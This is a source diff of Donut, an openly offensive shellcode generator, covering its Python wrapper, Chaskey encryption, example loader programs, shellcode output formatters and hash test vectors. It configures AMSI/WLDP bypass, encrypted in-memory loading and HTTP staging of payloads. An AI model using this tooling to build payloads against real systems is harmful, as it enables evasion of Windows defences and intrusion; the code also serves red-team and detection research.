60 // default type is position independent code for dual-mode (x86 + amd64)
61 c.inst_type = DONUT_INSTANCE_PIC;
62 c.arch = DONUT_ARCH_X84;
80
81 // default settings
82 c.inst_type = DONUT_INSTANCE_EMBED; // file is embedded
83 c.arch = DONUT_ARCH_X84; // dual-mode (x86+amd64)
6384 c.bypass = DONUT_BYPASS_CONTINUE; // continues loading even if disabling AMSI/WLDP fails
64
85 c.format = DONUT_FORMAT_BINARY; // default output format
86 c.compress = DONUT_COMPRESS_NONE; // compression is disabled by default
87 c.entropy = DONUT_ENTROPY_DEFAULT; // enable random names + symmetric encryption by default
88 c.exit_opt = DONUT_OPT_EXIT_THREAD; // default behaviour is to exit the thread
89 c.unicode = 0; // command line will not be converted to unicode for unmanaged DLL function
90
91 // input file
92 if(input != NULL) {
93 strncpy(c.input, input, DONUT_MAX_NAME - 1);
94 }
95
6596 // target cpu architecture
66 if (arch != NULL) {
97 if(arch != 0) {
6798 c.arch = arch;
6899 }
69
70100 // bypass options
71 if (bypass != NULL) {
101 if(bypass != 0) {
72102 c.bypass = bypass;
73103 }
74
75 // name of appdomain to use
76 if (appdomain != NULL) {
77 strncpy(c.domain, appdomain, DONUT_MAX_NAME - 1);
78 }
79
80 // assembly to use
81 if (file != NULL) {
82 strncpy(c.file, file, DONUT_MAX_NAME - 1);
83 }
84
85 //runtime version to use
86 if (runtime != NULL) {
104 // class of .NET assembly
105 if(cls != NULL) {
106 strncpy(c.cls, cls, DONUT_MAX_NAME - 1);
107 }
108 // name of domain to use for .NET assembly
109 if(domain != NULL) {
110 strncpy(c.domain, domain, DONUT_MAX_NAME - 1);
111 }
112 // encryption options
113 if(entropy != 0) {
114 c.entropy = entropy;
115 }
116 // output format
117 if(format != 0) {
118 c.format = format;
119 }
120 // method of .NET assembly
121 if(method != NULL) {
122 strncpy(c.method, method, DONUT_MAX_NAME - 1);
123 }
124 // module name
125 if(modname != NULL) {
126 strncpy(c.modname, modname, DONUT_MAX_NAME - 1);
127 }
128 // output file for loader
129 if(output != NULL) {
130 strncpy(c.output, output, DONUT_MAX_NAME - 1);
131 }
132 // parameters to method, DLL function or command line for unmanaged EXE
133 if(params != NULL) {
134 strncpy(c.param, params, DONUT_MAX_NAME - 1);
135 }
136 // runtime version to use for .NET DLL / EXE
137 if(runtime != NULL) {
87138 strncpy(c.runtime, runtime, DONUT_MAX_NAME - 1);
88139 }
89
90 // url of remote assembly
91 if (url != NULL) {
92 strncpy(c.url, url, DONUT_MAX_URL - 2);
93 c.inst_type = DONUT_INSTANCE_URL;
94 }
95
96 // class
97 if (cls != NULL) {
98 strncpy(c.cls, cls, DONUT_MAX_NAME - 1);
99 }
100
101 // method or exported api symbol
102 if (method != NULL) {
103 strncpy(c.method, method, DONUT_MAX_NAME - 1);
104 }
105
106 // parameters to method/exported API
107 if (params != NULL) {
108 strncpy(c.param, params, sizeof(c.param) - 1);
109 }
110
111 err = DonutCreate(&c);
112
113 /*
114 if (!(c.pic_len > 0)) {
115 return NULL;
116 }
117 */
118
140 // run entrypoint of unmanaged EXE as a thread
141 if(thread != 0) {
142 c.thread = 1;
143 }
144 // server
145 if(server != NULL) {
146 strncpy(c.server, server, DONUT_MAX_NAME - 2);
147 c.inst_type = DONUT_INSTANCE_HTTP;
148 }
149 // convert param to unicode? only applies to unmanaged DLL function
150 if(unicode != 0) {
151 c.unicode = 1;
152 }
153 // call RtlExitUserProcess to terminate host process
154 if(exit_opt != 0) {
155 c.exit_opt = exit_opt;
156 }
157 // fork a new thread and execute address of original entry point
158 if(oep != NULL) {
159 c.oep = strtoull(oep, NULL, 16);
160 }
161 // pack/compress input file
162 if(compress != 0) {
163 c.compress = compress;
164 }
165
166 int err = DonutCreate(&c);
167
168 // printf("Error : %i\n", err);
169
119170 PyObject *shellcode = Py_BuildValue("y#", c.pic, c.pic_len);
120171
121172 DonutDelete(&c);
130181 Donut_Create, // C wrapper function
131182 METH_VARARGS|METH_KEYWORDS,
132183 "Calls DonutCreate to generate shellcode for a .NET assembly" // documentation
133 }, {
134 NULL, NULL, 0, NULL
135 }
184 },
185
186 {NULL, NULL, 0, NULL}
136187 };
137188
138189 // modules definition
+85
-11
encrypt.c less more
3030
3131 #include "encrypt.h"
3232
33 #include <stdio.h>
34 #include <string.h>
35
3336 static void chaskey(void *mk, void *p) {
3437 uint32_t i,*w=p,*k=mk;
3538
5356 }
5457
5558 // encrypt/decrypt data in counter mode
56 void donut_encrypt(void *mk, void *ctr, void *data, size_t len) {
59 void donut_encrypt(void *mk, void *ctr, void *data, uint32_t len) {
5760 uint8_t x[CIPHER_BLK_LEN],
5861 *p=(uint8_t*)data,
5962 *c=(uint8_t*)ctr;
60 int i, r;
63 uint32_t i, r;
6164
6265 while(len) {
6366 // copy counter+nonce to local buffer
7780 len -= r; p += r;
7881
7982 // update counter
80 for(i=CIPHER_BLK_LEN;i>0;i--)
83 for(i=CIPHER_BLK_LEN;(int)i>0;i--)
8184 if(++c[i-1]) break;
8285 }
8386 }
8487
8588 #ifdef TEST
8689
90 #include <stdint.h>
8791 #include <stdio.h>
92 #include <stdlib.h>
8893 #include <string.h>
89 #include <stdint.h>
94 #include <sys/stat.h>
95 #include <inttypes.h>
96 #include <fcntl.h>
97
98 #if defined(_WIN32) || defined(_WIN64)
99 #define WINDOWS
100 #include <windows.h>
101 #pragma comment(lib, "advapi32.lib")
102 #else
103 #include <unistd.h>
104 #endif
105
106 void bin2hex(const char *str, void *bin, int len) {
107 int i;
108 uint8_t *p = (uint8_t*)bin;
109
110 printf("%s[%i] = { ", str, len);
111
112 for(i=0;i<len;i++) {
113 printf("0x%02x", p[i]);
114 if((i+1) != len) putchar(',');
115 }
116 printf(" };\n");
117 }
118
119 // generate test vector
120 void gen_crypto_tv(void *mk, void *ctr) {
121 uint8_t key[16], data[77], tmp[16];
122 int i, j;
123
124 memset(data, 0, sizeof(data));
125 memcpy(key, mk, 16);
126 memcpy(tmp, ctr, 16);
127
128 for(i=0; i<128; i++) {
129 donut_encrypt(key, tmp, data, sizeof(data));
130 // update key with first 16 bytes of ciphertext
131 for(j=0; j<16; j++) key[j] ^= data[j];
132 }
133 bin2hex("donut_crypt_tv", data, 16);
134 }
90135
91136 // 128-bit master key
92 uint8_t key[16] =
137 uint8_t key_tv[16] =
93138 { 0x56, 0x09, 0xe9, 0x68, 0x5f, 0x58, 0xe3, 0x29,
94139 0x40, 0xec, 0xec, 0x98, 0xc5, 0x22, 0x98, 0x2f };
95140
96141 // 128-bit plain text
97 uint8_t plain[16]=
142 uint8_t plain_tv[16]=
98143 { 0xb8, 0x23, 0x28, 0x26, 0xfd, 0x5e, 0x40, 0x5e,
99144 0x69, 0xa3, 0x01, 0xa9, 0x78, 0xea, 0x7a, 0xd8 };
100145
101146 // 128-bit cipher text
102 uint8_t cipher[16] =
147 uint8_t cipher_tv[16] =
103148 { 0xd5, 0x60, 0x8d, 0x4d, 0xa2, 0xbf, 0x34, 0x7b,
104149 0xab, 0xf8, 0x77, 0x2f, 0xdf, 0xed, 0xde, 0x07 };
105150
151 // 128-bit counter
152 uint8_t ctr_tv[16] =
153 { 0xd0, 0x01, 0x36, 0x9b, 0xef, 0x6a, 0xa1, 0x05,
154 0x1d, 0x2d, 0x21, 0x98, 0x19, 0x8d, 0x88, 0x93 };
155
156 // 128-bit ciphertext for testing donut_encrypt
157 uint8_t donut_crypt_tv[16] =
158 { 0xd0, 0x01, 0x36, 0x9b, 0xef, 0x6a, 0xa1, 0x05,
159 0x1d, 0x2d, 0x21, 0x98, 0x19, 0x8d, 0x8b, 0x13 };
160
161 int crypto_test(void) {
162 uint8_t key[16], data[77], tmp[16];
163 int i, j;
164
165 memset(data, 0, sizeof(data));
166 memcpy(key, key_tv, 16);
167 memcpy(tmp, ctr_tv, 16);
168
169 for(i=0; i<128; i++) {
170 // encrypt data
171 donut_encrypt(key, tmp, data, sizeof(data));
172 // update key with first 16 bytes of ciphertext
173 for(j=0; j<16; j++) key[j] ^= data[j];
174 }
175 return (memcmp(tmp, donut_crypt_tv, 16) == 0);
176 }
177
106178 int main(void) {
107 uint8_t data[16];
179 uint8_t tmp1[16];
108180 int equ;
109181
110 memcpy(data, plain, 16);
111 chaskey(key, data);
112 equ = (memcmp(data, cipher, 16)==0);
182 // Chaskey test
183 memcpy(tmp1, plain_tv, 16);
184 chaskey(key_tv, tmp1);
185 equ = (memcmp(tmp1, cipher_tv, 16)==0);
113186 printf("Chaskey test : %s\n", equ ? "OK" : "FAILED");
187 printf("Donut Encrypt test : %s\n", crypto_test() ? "OK" : "FAILED");
114188 return 0;
115189 }
116190
+82
-0
examples/dynamic.c less more
0
1 // dynamic example (doesn't work with .NET DLL)
2 // odzhan
3
4 #include "donut.h"
5
6 int main(int argc, char *argv[]) {
7 DONUT_CONFIG c;
8 int err;
9
10 // function pointers
11 DonutCreate_t _DonutCreate;
12 DonutDelete_t _DonutDelete;
13 DonutError_t _DonutError;
14
15 // need at least a file
16 if(argc != 2) {
17 printf(" [ usage: donut_dynamic <file>\n");
18 return 0;
19 }
20
21 // try load donut.dll or donut.so
22 #if defined(WINDOWS)
23 HMODULE m = LoadLibrary("donut.dll");
24 if(m != NULL) {
25 _DonutCreate = (DonutCreate_t)GetProcAddress(m, "DonutCreate");
26 _DonutDelete = (DonutDelete_t)GetProcAddress(m, "DonutDelete");
27 _DonutError = (DonutError_t) GetProcAddress(m, "DonutError");
28
29 if(_DonutCreate == NULL || _DonutDelete == NULL || _DonutError == NULL) {
30 printf(" [ Unable to resolve Donut API.\n");
31 return 0;
32 }
33 } else {
34 printf(" [ Unable to load donut.dll.\n");
35 return 0;
36 }
37 #else
38 void *m = dlopen("donut.so", RTLD_LAZY);
39 if(m != NULL) {
40 _DonutCreate = (DonutCreate_t)dlsym(m, "DonutCreate");
41 _DonutDelete = (DonutDelete_t)dlsym(m, "DonutDelete");
42 _DonutError = (DonutError_t) dlsym(m, "DonutError");
43
44 if(_DonutCreate == NULL || _DonutDelete == NULL || _DonutError == NULL) {
45 printf(" [ Unable to resolve Donut API.\n");
46 return 0;
47 }
48 } else {
49 printf(" [ Unable to load donut.so.\n");
50 return 0;
51 }
52 #endif
53
54 memset(&c, 0, sizeof(c));
55
56 // copy input file
57 lstrcpyn(c.input, argv[1], DONUT_MAX_NAME-1);
58
59 // default settings
60 c.inst_type = DONUT_INSTANCE_EMBED; // file is embedded
61 c.arch = DONUT_ARCH_X84; // dual-mode (x86+amd64)
62 c.bypass = DONUT_BYPASS_CONTINUE; // continues loading even if disabling AMSI/WLDP fails
63 c.format = DONUT_FORMAT_BINARY; // default output format
64 c.compress = DONUT_COMPRESS_NONE; // compression is disabled by default
65 c.entropy = DONUT_ENTROPY_DEFAULT; // enable random names + symmetric encryption by default
66 c.exit_opt = DONUT_OPT_EXIT_THREAD; // default behaviour is to exit the thread
67 c.thread = 1; // run entrypoint as a thread
68 c.unicode = 0; // command line will not be converted to unicode for unmanaged DLL function
69
70 // generate the shellcode
71 err = _DonutCreate(&c);
72 if(err != DONUT_ERROR_SUCCESS) {
73 printf(" [ Error : %s\n", _DonutError(err));
74 return 0;
75 }
76
77 printf(" [ loader saved to %s\n", c.output);
78
79 _DonutDelete(&c);
80 return 0;
81 }
+44
-0
examples/static.c less more
0
1 // static example (doesn't work with .NET DLL)
2 // odzhan
3
4 #include "donut.h"
5
6 int main(int argc, char *argv[]) {
7 DONUT_CONFIG c;
8 int err;
9
10 // need at least a file
11 if(argc != 2) {
12 printf(" [ usage: donut_static <file>\n");
13 return 0;
14 }
15
16 memset(&c, 0, sizeof(c));
17
18 // copy input file
19 lstrcpyn(c.input, argv[1], DONUT_MAX_NAME-1);
20
21 // default settings
22 c.inst_type = DONUT_INSTANCE_EMBED; // file is embedded
23 c.arch = DONUT_ARCH_X84; // dual-mode (x86+amd64)
24 c.bypass = DONUT_BYPASS_CONTINUE; // continues loading even if disabling AMSI/WLDP fails
25 c.format = DONUT_FORMAT_BINARY; // default output format
26 c.compress = DONUT_COMPRESS_NONE; // compression is disabled by default
27 c.entropy = DONUT_ENTROPY_DEFAULT; // enable random names + symmetric encryption by default
28 c.exit_opt = DONUT_OPT_EXIT_THREAD; // default behaviour is to exit the thread
29 c.thread = 1; // run entrypoint as a thread
30 c.unicode = 0; // command line will not be converted to unicode for unmanaged DLL function
31
32 // generate the shellcode
33 err = DonutCreate(&c);
34 if(err != DONUT_ERROR_SUCCESS) {
35 printf(" [ Error : %s\n", DonutError(err));
36 return 0;
37 }
38
39 printf(" [ loader saved to %s\n", c.output);
40
41 DonutDelete(&c);
42 return 0;
43 }
+230
-0
format.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include "format.h"
32
33 /**
34 Encoding: base64
35 Author : Odzhan
36
37 Encoding: c, python, ruby, c#, powershell and hex
38 Author : BITAM Salim https://github.com/soolidsnake
39 */
40
41 // calculate length of buffer required for base64 encoding
42 #define B64_LEN(N) (((4 * (N / 3)) + 4) & -4)
43
44 static const char b64_tbl[] =
45 "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
46
47 // Compact implementation of base64 encoding.
48 // The main encoding loop is inspired by Qkumba AKA Peter Ferrie.
49 // This uses a lookup table and accounts for unaligned input.
50 //
51 // odzhan
52 //
53 static int b64_encode(
54 const void *src, uint32_t inlen,
55 void *dst, uint32_t *outlen)
56 {
57 uint32_t i, len, x;
58 uint8_t *in = (uint8_t*)src, *out = (uint8_t*)dst;
59
60 // check arguments
61 if(outlen == NULL) return 0;
62
63 // calculate length of buffer required for encoded string
64 len = B64_LEN(inlen);
65
66 // return the length?
67 if(out == NULL) {
68 *outlen = len;
69 return 1;
70 }
71
72 // can buffer contain string?
73 if(len > *outlen) return 0;
74
75 // main encoding loop
76 while(inlen != 0) {
77 // load 3 bytes or whatever remains
78 for(x=i=0; i<3; i++) {
79 // add byte from input or zero
80 x |= ((i < inlen) ? *in++ : 0);
81 x <<= 8;
82 }
83 // increase by 1
84 inlen++;
85 // encode 3 bytes
86 for(i=4; inlen && i>0; i--) {
87 x = ROTL32(x, 6);
88 *out++ = b64_tbl[x % 64];
89 --inlen;
90 }
91 }
92 // if required, add padding
93 while(i!=0) { *out++ = '='; i--; }
94 // add null terminator
95 *out = 0;
96 // calculate output length by subtracting 2 pointers
97 *outlen = (uint32_t)(out - (uint8_t*)dst);
98 return 1;
99 }
100
101 int base64_template(void *pic, uint32_t pic_len, FILE *fd) {
102 uint32_t outlen;
103 void *base64;
104
105 DPRINT("Calculating length of base64 encoding");
106 if(b64_encode(NULL, pic_len, NULL, &outlen)) {
107 DPRINT("Required length is %"PRId32, outlen);
108 base64 = calloc(1, outlen + 1);
109 if(base64 == NULL) {
110 return DONUT_ERROR_NO_MEMORY;
111 }
112 DPRINT("Encoding shellcode");
113 if(b64_encode(pic, pic_len, base64, &outlen)) {
114 DPRINT("Writing %"PRId32 " bytes to file", outlen);
115 fwrite(base64, 1, outlen, fd);
116 }
117 }
118 // if on windows, copy base64 string to clipboard
119 #if defined(WINDOWS)
120 LPTSTR strCopy;
121 HGLOBAL hCopy;
122
123 DPRINT("Opening clipboard");
124 if(OpenClipboard(NULL)) {
125 DPRINT("Empying contents");
126 EmptyClipboard();
127
128 DPRINT("Allocating memory");
129 hCopy = GlobalAlloc(GMEM_MOVEABLE, outlen);
130 if(hCopy != NULL) {
131 strCopy = GlobalLock(hCopy);
132 // copy base64 string to memory
133 CopyMemory(strCopy, base64, outlen);
134 GlobalLock(hCopy);
135 DPRINT("Setting clipboard data");
136 // copy to clipboard
137 SetClipboardData(CF_TEXT, hCopy);
138 GlobalFree(hCopy);
139 }
140 CloseClipboard();
141 }
142 #endif
143 DPRINT("Freeing memory");
144 free(base64);
145 return DONUT_ERROR_SUCCESS;
146 }
147
148 int c_ruby_template(void * pic, uint32_t pic_len, FILE* fd){
149 uint32_t j;
150 uint8_t *p = (uint8_t*)pic;
151
152 fprintf(fd, "unsigned char buf[] = \n");
153
154 for(j=0; j < pic_len; j++) {
155 if(j % 16 == 0) fputc('\"', fd);
156
157 fprintf(fd, "\\x%02x", p[j]);
158
159 if(j % 16 == 15){
160 fprintf(fd, "\"\n");
161 }
162 }
163 if(j % 16 != 15) fputc('\"', fd);
164
165 fputc(';', fd);
166
167 return DONUT_ERROR_SUCCESS;
168 }
169
170 int py_template(void * pic, uint32_t pic_len, FILE* fd){
171 uint32_t j;
172 uint8_t *p = (uint8_t*)pic;
173
174 fprintf(fd, "buf = \"\"\n");
175
176 for(j=0; j < pic_len; j++){
177 if(j % 16 == 0) {
178 fprintf(fd, "buff += \"");
179 }
180 fprintf(fd, "\\x%02x", p[j]);
181
182 if(j % 16 == 15) {
183 fprintf(fd, "\"\n");
184 }
185 }
186 if(j % 16 != 15) {
187 fputc('\"', fd);
188 }
189 return DONUT_ERROR_SUCCESS;
190 }
191
192 int powershell_template(void * pic, uint32_t pic_len, FILE* fd){
193 uint32_t j;
194 uint8_t *p = (uint8_t*)pic;
195
196 fprintf(fd, "[Byte[]] $buf = ");
197
198 for(j=0; j < pic_len; j++){
199 fprintf(fd, "0x%02x", p[j]);
200 if(j < pic_len-1) fputc(',', fd);
201 }
202 return DONUT_ERROR_SUCCESS;
203 }
204
205 int csharp_template(void * pic, uint32_t pic_len, FILE* fd){
206 uint32_t j;
207 uint8_t *p = (uint8_t*)pic;
208
209 fprintf(fd, "byte[] my_buf = new byte[%" PRId32"] {\n", pic_len);
210
211 for(j=0; j < pic_len; j++){
212 fprintf(fd, "0x%02x", p[j]);
213 if(j < pic_len-1) fputc(',', fd);
214 }
215 fprintf(fd, "};");
216
217 return DONUT_ERROR_SUCCESS;
218 }
219
220 int hex_template(void * pic, uint32_t pic_len, FILE* fd){
221 uint32_t j;
222 uint8_t *p = (uint8_t*)pic;
223
224 for(j=0; j < pic_len; j++){
225 fprintf(fd, "\\x%02x", p[j]);
226 }
227 return DONUT_ERROR_SUCCESS;
228 }
229
+7
-0
generators/Readme.md less more
0 # Generators
1
2 This folder contains Donut generators written in other languages than C. They are all developed by third-parties and are maintained separately, but are linked here as submodules. To clone Donut along with the submodules, run:
3
4 ```
5 git clone https://github.com/TheWover/donut.git --recursive
6 ```
+230
-23
hash.c less more
5353 t = k[3];
5454 k[3] = (ROTR32(k[1], 8) + k[0]) ^ i;
5555 k[0] = ROTR32(k[0],29) ^ k[3];
56 k[1] = k[2]; k[2] = t;
56
57 k[1] = k[2];
58 k[2] = t;
5759 }
5860 // return 64-bit ciphertext
5961 return x.q;
107109
108110 #ifdef TEST
109111
112 #include <stdint.h>
110113 #include <stdio.h>
111114 #include <stdlib.h>
112115 #include <string.h>
116 #include <sys/stat.h>
117 #include <inttypes.h>
118 #include <fcntl.h>
119
120 #if defined(_WIN32) || defined(_WIN64)
121 #define WINDOWS
122 #include <windows.h>
123 #pragma comment(lib, "advapi32.lib")
124 #else
125 #include <unistd.h>
126 #endif
127
128 // ******************************
129 // test vectors for SPECK-64/128
130 //
131 // 128-bit key
132 uint8_t key64[16]=
133 { 0x00, 0x01, 0x02, 0x03,
134 0x08, 0x09, 0x0a, 0x0b,
135 0x10, 0x11, 0x12, 0x13,
136 0x18, 0x19, 0x1a, 0x1b };
137
138 // 64-bit plain text
139 uint8_t plain64[8]=
140 { 0x74, 0x65, 0x72, 0x3b,
141 0x2d, 0x43, 0x75, 0x74 };
142
143 // 64-bit cipher text
144 uint8_t cipher64[8]=
145 { 0x48, 0xa5, 0x6f, 0x8c,
146 0x8b, 0x02, 0x4e, 0x45 };
147
148 // 64-bit type
149 typedef union _w64_t {
150 uint8_t b[8];
151 uint32_t w[2];
152 uint64_t q;
153 } w64;
154
155 // ******************************
156 // test vectors for Maru hash
157 //
158 typedef struct _maru_tv_t {
159 const char *str;
160 uint64_t hash;
161 } maru_tv_t;
162
163 maru_tv_t maru_tv[MARU_MAX_STR] = {
164 {"", 0x8E63EC0D29F27D07},
165 {"C", 0x19C7DC40E602AC8E},
166 {"73", 0x5197B6ACC87EF423},
167 {"NY4", 0x3BC2F21615A953C5},
168 {"X9TM", 0xC9EC6B72BF5273D6},
169 {"H339P", 0x6B60077EF084C1E2},
170 {"TMCT3N", 0x33374AA7206F00FC},
171 {"RF4M66W", 0xF7B91D9C42A886C5},
172 {"XTCX43NN", 0x615D4FB7A2246376},
173 {"C6XCYXF9F", 0x80D4B6324A24CEB6},
174 {"RR3TN69H9M", 0xE6369CFF4F98B4F8},
175 {"F9C9YNTMYYR", 0xF173A1158A4D80A9},
176 {"FPW779364RYH", 0x517A4E86DF00BB97},
177 {"WHN4N9CT7YF7C", 0xFCBA9541CD7765A5},
178 {"633H6CTRC64FWR", 0x79EEC9CC663EDDC1},
179 {"WPNX66993HPWNYX", 0x139CFA0D49AF17DC},
180 {"H66C3Y9F677WP96N", 0xEFF27A644D53171A},
181 {"TY3YX7N3FPN7YNWT4", 0x5361C6DBF89D0B47},
182 {"YF496N7XH4HYHRN6WM", 0x71451CE666D8E9A4},
183 {"TWP4M739RYTCTFMMCC7", 0xC17E5C46E2BEAD},
184 {"4FHNWP4MR9TT9Y6HYWCX", 0x1E40C5A64B8ECE85},
185 {"TCMHT3TF7T4TRCWCF6RPF", 0xD02290F438AA84A9},
186 {"4WW63CTHPR36MN7P3WXTHT", 0x79FBDCFC2ECE09FF},
187 {"NFFMNM3CF3NXY6P9MCC7YPX", 0x10B7C56D102D623B},
188 {"R74YN9MX7PMP364HYNYCR9FY", 0x86EC8AA614611458},
189 {"94X3NFT7W4FPTX3MCTY99HMPR", 0x7929169892B04FC1},
190 {"66R379FR67W7T7H79WTCF37H6Y", 0xBEA85FD3754045D8},
191 {"4F6HFPT3NRN7WPP766RFCXR43RX", 0x76E410266A6830A},
192 {"HP374TWWPMYRTTWC6Y6T4C4T4HP4", 0x6A7509443FF48F74},
193 {"TTX3966P63XPYMPM6XM994TX9X9X3", 0xA8AFC37C137AE14},
194 {"34TX7XRX4WH7T6PW439TNRY77FHPT4", 0xE64667746B53394},
195 {"P3WRCCT4PXN3H6PMNR3YXY6X379MTXH", 0xCE981B296791D5C7},
196 {"73YF99H9XXTYC6XF6CXTPCM4YXYN33R4", 0xE39B1FC51BED4BA9},
197 {"T7R3PR43C93MH4TRT6M644T7RCXMX4WM6", 0xE25C6B39CB28FDB5},
198 {"44M69YYFX3C9H9M6P46933PW34RRCM9NXX", 0x84DBD675600E871E},
199 {"7TW7P76CXMFC3HFTFHMWXWW33TWTPT6PYP3", 0xE00F660E699F9231},
200 {"6CH6W7WYHH7HXT7RTMW4FRCN39HR997F6FWN", 0x32AEC917C63A878E},
201 {"WF3HNPT37XPPXYFXR447F7RWF3C69H74CT6R6", 0x4B4FCD2604496365},
202 {"WR9CCHH9NNNXCXYMXMFFW6YYC7449M4HYXM4MC", 0x330DA5A18A58C952},
203 {"C9993Y93PTWYRNP46PYN763RNFYP4PN4WWHR9CM", 0x5249D03CD52C71DB},
204 {"XNPXCY47FWWMTFF6R7RWNX79MC4YN43M9RYCC4RX", 0xF11E92E74F70C4F4},
205 {"3RPX6MFNCWPMPT3M467HWCYCHH9PM7R6MFWXYXNTN", 0x86C8BD9789AA71BE},
206 {"633MWRYMCYF3TTCRP6HXTR9TTX43T3MYXPPWMWFMF6", 0xA5F12FC7418615CC},
207 {"RW7NN6Y4779639NNTHN6TR939F3799FNWTH4FP46RNY", 0x37EADA4549B0B96F},
208 {"MCTRH9PTXRXFPMYRP9Y4TC4PCRX4W9YFCW649R3YN33W", 0x8E5BADDF84BB9779},
209 {"F7RT3H36PNH6CF9TWCRNYMFWX9M9MTTNY6C7X43HC4PN9", 0x8040D317E8DCD294},
210 {"7HTCNCTNHRFY6HCRTYPTHYP3H9T4PR96RWRY7NRPTMH936", 0x151FB43ECC51AFA1},
211 {"NYRMPMYCWXTPRCYM9TX6Y4XTMY9RT3PHH49PP36H7XR7WPN", 0x650A8724A052DFC5},
212 {"6PX3XWM3X973693M4F373R3N9FNC4CCTXN3CTTYMP3NW4C49", 0x9E48D8154522BFDD},
213 {"74RNX9MTPW7FNY9WMTXNPPRMR97PRPPRCN3CMHPNWFFW44R3C", 0xDC1ABDA05084DCBA},
214 {"47NC63XRTXXPWHN76H9XF9R7TTHWR6T7XMF9TMCHP4FX4WCYTT", 0x5DC075A21ECF2DD8},
215 {"TYMXHXC4N6XXTR4T7X37PHWTYXFF9M7MXP6477RW4FM7P9PFXFR", 0x2CD151D5D71FA785},
216 {"MRPW7NCXPT4N7YN3WN7P9WYNY3PPR464WR7P7PP37MXFF9FC7WTH", 0x7B88469D5AFE14D9},
217 {"9XW6RYX6NTYC4NCRR7YRTWM7HWNFXRT4P396CYMFPRNTRW3X69R39", 0x81E069528C3C9BEE},
218 {"9NMRWF4W34MHWTPP74RY34YWMT94H76HTRX34MR7C9MF696M3TXMN3", 0x4D19A0CB3BC48BFF},
219 {"HF6FM9RMT3NPMR37TX3FPTFYRFNXTMHWTF7WN94YNP4TMP3FNHM3N9F", 0x30CEBE63BE4E30F1},
220 {"NW7CCWFTTNFPMTY3H6X96HX6MXY67W3RPTRCCWHWPYPC7PPRF74PH7RC", 0x64F3DF1E551B22BE},
221 {"HFH43PM9TNCCW79XCMW79HYCN4HY6MT9MFFRYRXYX4H3P9T9FHF6NWC3C", 0xEF36678895FBB3A8},
222 {"N7WH9WYMNHYY3C3RRFTW3RNYH3C646C97FTPT3MH7TMW6MTC4PT44NWCWH", 0x1B75D90E82D98E1D},
223 {"663F4T7PMWN996R9FYWRY3Y33HCNFH6PRWF9TPHN363YFFF6C9CHTP3XNXP", 0x25767AD747B833D6},
224 {"3P7934TX6CFHPM6TWY6H4CXT47P4XRMFTPNMCFP9H9F4MPFWWF9XRMPHFCYX", 0x1F3E15CB56A60E93},
225 {"WW6YN7NXTH9TRT4PYW9W3WTNP9XMHP6Y3NPX7R93Y763M9HRHWTN93W3M9WX3", 0x744735578C4F6EF2},
226 {"HT6R4P6P7T4YFYYX3H3F49XYMPCPMWNT6R3PHTM47PTHTRCN9XMFHHYTH7TMPY", 0x559EA0D5309795E6},
227 {"NHP9Y96YYF44H7NN33WYYC364CY3W4FNF6F7WTHN6WFF6RXXRWNRFF4T9XF934N", 0xBE7F06CC36982F52},
228 };
229
230 void bin2hex(const char *str, void *bin, int len) {
231 int i;
232 uint8_t *p = (uint8_t*)bin;
233
234 printf("%s[%i] = { ", str, len);
235
236 for(i=0;i<len;i++) {
237 printf("0x%02x", p[i]);
238 if((i+1) != len) putchar(',');
239 }
240 printf(" };\n");
241 }
242
243 // returns 1 on success else <=0
244 static int CreateRandom(void *buf, uint64_t len) {
245
246 #if defined(WINDOWS)
247 HCRYPTPROV prov;
248 int ok;
249
250 // 1. acquire crypto context
251 if(!CryptAcquireContext(
252 &prov, NULL, NULL,
253 PROV_RSA_AES,
254 CRYPT_VERIFYCONTEXT | CRYPT_SILENT)) return 0;
255
256 ok = (int)CryptGenRandom(prov, (DWORD)len, buf);
257 CryptReleaseContext(prov, 0);
258
259 return ok;
260 #else
261 int fd;
262 uint64_t r=0;
263 uint8_t *p=(uint8_t*)buf;
264
265 fd = open("/dev/urandom", O_RDONLY);
266
267 if(fd > 0) {
268 for(r=0; r<len; r++, p++) {
269 if(read(fd, p, 1) != 1) break;
270 }
271 close(fd);
272 }
273 return r == len;
274 #endif
275 }
276
277 // Generate a random string, not exceeding MARU_MAX_STR bytes
278 // tbl is from https://stackoverflow.com/a/27459196
279 static int GenRandomString(void *output, uint64_t len) {
280 uint8_t rnd[MARU_MAX_STR];
281 int i;
282 char tbl[]="HMN34P67R9TWCXYF";
283 char *str = (char*)output;
284
285 if(len > (MARU_MAX_STR - 1)) return 0;
286
287 // generate MARU_MAX_STR random bytes
288 if(!CreateRandom(rnd, MARU_MAX_STR)) return 0;
289
290 // generate a string using unambiguous characters
291 for(i=0; i<len; i++) {
292 str[i] = tbl[rnd[i] % (sizeof(tbl) - 1)];
293 }
294 str[i] = 0;
295 return 1;
296 }
297
298 void gen_maru_tv(void) {
299 char str[MARU_MAX_STR+1];
300 w64 h, iv;
301 int i;
302
